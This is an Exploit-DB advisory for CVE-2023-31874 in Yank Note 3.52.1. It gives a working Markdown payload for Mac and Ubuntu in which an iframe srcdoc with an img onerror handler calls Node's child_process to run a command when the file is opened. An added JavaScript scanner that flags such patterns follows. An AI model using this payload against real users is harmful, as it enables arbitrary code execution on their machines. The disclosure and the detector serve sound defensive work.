Yank Note v3.52.1 (Electron) – Arbitrary Code Execution

  • Author: 8bitsec
    Date: 2023-05-23
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51470/
  • # Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
    # Date: 2023-04-27
    # Exploit Author: 8bitsec
    # CVE: CVE-2023-31874
    # Vendor Homepage: yank-note.com
    # Software Link: https://github.com/purocean/yn
    # Version: 3.52.1
    # Tested on: [Ubuntu 22.04 | Mac OS 13]
    
    Release Date: 2023-04-27
    
    Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement
    
    Technical Details & Description:
    
    A vulnerability in Yank Note v3.52.1 allows arbitrary code execution when a user opens a specially crafted file.
    
    Proof of Concept (PoC):
    Arbitrary code execution:
    
    Create a markdown file (.md) in any text editor and write the following payload.
    Mac:
    <iframe srcdoc="<img src=x onerror=alert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">
    
    Ubuntu:
    <iframe srcdoc="<img src=x onerror=alert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">
    
    Opening the file in Yank Note automatically launches the Calculator application.
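
A defender-side triage check for the file shape described above, as an added example that is not part of the original advisory or of the Yank Note code base: it scans Markdown for raw HTML that can run script when rendered and for the Node bridge reference seen in the PoC. The rule ids, the sample document and the treatment of fenced code as inert text are assumptions of this example.

```javascript
// Added example (not from the advisory or the Yank Note code base).
// Rule ids and SAMPLE are constructed for illustration.
const RULES = [
  { id: 'iframe-srcdoc', re: /<iframe\b[^>]*\bsrcdoc\b/gi },
  { id: 'inline-handler', re: /<[a-z][^>]*\son[a-z]+\s*=/gi },
  { id: 'script-tag', re: /<script\b/gi },
  { id: 'js-url', re: /\b(?:src|href)\s*=\s*["']?\s*javascript:/gi },
  { id: 'node-bridge', re: /\b(?:nodeRequire|require)\s*\(\s*['"`]child_process['"`]/gi },
];
const NAMED = new Map([['lt', '<'], ['gt', '>'], ['quot', '"'], ['apos', "'"], ['amp', '&']]);

// srcdoc content may be entity-encoded, so decode before matching.
// Code points below 14 stay encoded so line numbers do not shift.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, e) => {
    if (e[0] !== '#') return NAMED.get(e.toLowerCase()) ?? m;
    const cp = /^#x/i.test(e) ? parseInt(e.slice(2), 16) : parseInt(e.slice(1), 10);
    return cp > 13 && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

function scanMarkdown(text) {
  let fence = null; // marker of the fenced code block we are inside, if any
  // Assumption: fenced code renders as escaped text, so blank it (keeping line count).
  const visible = text.split(/\r?\n/).map((line) => {
    const m = /^ {0,3}(`{3,}|~{3,})(.*)$/.exec(line);
    if (m && !fence) { fence = m[1]; return ''; }
    if (m && m[1][0] === fence[0] && m[1].length >= fence.length && !m[2].trim()) fence = null;
    return fence || m ? '' : line;
  });
  const body = decodeEntities(visible.join('\n'));
  const findings = [];
  for (const { id, re } of RULES) {
    for (const hit of body.matchAll(re)) {
      // Tags may span lines, so derive the line number from the match offset.
      findings.push({ rule: id, line: body.slice(0, hit.index).split('\n').length });
    }
  }
  return findings.sort((a, b) => a.line - b.line);
}

// Constructed sample: an inert fenced snippet, then an entity-encoded iframe.
const SAMPLE = [
  '# Notes', '~~~html', '<img src=x onerror=alert(1)>', '~~~',
  '<iframe srcdoc="&lt;img src=x',
  "  onerror=parent.nodeRequire('child_process')&gt;\"></iframe>",
].join('\n');
console.log(scanMarkdown(SAMPLE));
```

A hit is a reason to inspect the file in a plain text editor before opening it in a Markdown renderer.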